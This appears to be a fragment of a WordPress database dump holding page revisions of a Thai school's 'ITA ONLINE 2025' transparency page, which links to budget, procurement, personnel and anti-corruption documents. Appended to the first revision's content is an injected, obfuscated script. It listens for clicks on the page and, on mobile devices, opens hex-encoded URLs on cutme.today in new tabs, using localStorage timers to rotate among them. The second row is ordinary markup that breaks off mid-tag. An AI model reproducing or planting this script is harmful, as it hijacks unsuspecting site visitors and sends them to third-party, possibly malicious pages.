class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-08 10:56:41','2025-07-08 03:56:41','',871,'http://pakhaeng.ssk.in.th/?p=1757',0,'revision','',0),
(1758,1,'2025-07-08 10:56:50','2025-07-08 03:56:50','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span 